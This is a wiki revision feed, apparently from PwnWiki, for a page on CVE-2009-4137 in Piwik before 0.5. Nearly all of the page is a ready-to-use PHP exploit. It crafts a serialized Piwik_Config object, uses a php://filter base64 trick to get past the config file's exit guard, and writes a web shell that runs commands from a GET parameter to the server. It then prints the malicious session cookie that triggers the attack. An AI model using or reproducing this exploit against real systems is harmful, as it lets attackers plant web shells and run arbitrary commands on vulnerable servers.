https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2009-4137_Piwik_before_0.5_%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%2F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9ECVE-2009-4137 Piwik before 0.5 任意代碼執行/文件上傳漏洞 - Revision history2026-04-10T10:17:42ZRevision history for this page on the wikiMediaWiki 1.35.1https://pwnwiki.com/index.php?title=CVE-2009-4137_Piwik_before_0.5_%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C/%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E&diff=899&oldid=prevPwnwiki: Created page with "==EXP== <pre> <?php /* We exploit the CVE-2009-4137 by using a php object injection of a Piwik_Config object The __destruct() function of this object writes the config to the..."2021-04-02T04:12:46Z<p>Created page with "==EXP== <pre> <?php /* We exploit the CVE-2009-4137 by using a php object injection of a Piwik_Config object The __destruct() function of this object writes the config to the..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
<?php<br />
/*<br />
We exploit the CVE-2009-4137 by using a php object injection of a Piwik_Config object<br />
The __destruct() function of this object writes the config to the path specified in the pathIniFileUserConfig variable<br />
The content of a config file is always prepended by a php showstopper as seen in the following two code-lines of Config.php<br />
<br />
$configFile = "; <?php exit; ?> DO NOT REMOVE THIS LINE\n";<br />
$configFile .= "; file automatically generated or modified by Piwik; you can manually override the default values in global.ini.php by redefining them in this file.\n";<br />
<br />
To circumvent this, we use php://filter/write=convert.base64-decode and pre-encode our payload. PHP is nice enough to just skip every character that is not part of the base64 alphabet<br />
<br />
We then prepend a single character to correct the padding to our payload and write a simple php webshell.<br />
A request to the piwik server with the cookie then triggers the exploit<br />
<br />
(You need to url_encode the Cookie if you use manual requests. The '+' and '/' characters of the base64 alphabet must be encoded)<br />
*/<br />
<br />
class Zend_Config {<br />
protected $_data = array(<br />
"login" => "root",<br />
"password" => "rootroot",<br />
"email" => "root@rootroot.com"<br />
);<br />
}<br />
<br />
class Piwik_Config {<br />
protected $configFileUpdated = true;<br />
protected $doWriteFileWhenUpdated = true;<br />
protected $correctCwd = ".";<br />
protected $pathIniFileUserConfig = "php://filter/write=convert.base64-decode/resource=/var/www/piwik/webshell.php";<br />
protected $userConfig = array();<br />
<br />
function __construct() { // 'a' for padding<br />
$this->userConfig["a".base64_encode('<?php system($_GET[\'cmd\']); ?>'."\n")] = new Zend_Config;<br />
}<br />
}<br />
<br />
$b64 = base64_encode(serialize(new Piwik_Config));<br />
$urlEncoded = urlencode($b64);<br />
echo "Use this cookie";<br />
echo "PIWIK_SESSID=".$urlEncoded."\n";<br />
<br />
?><br />
<br />
<br />
</pre></div>Pwnwiki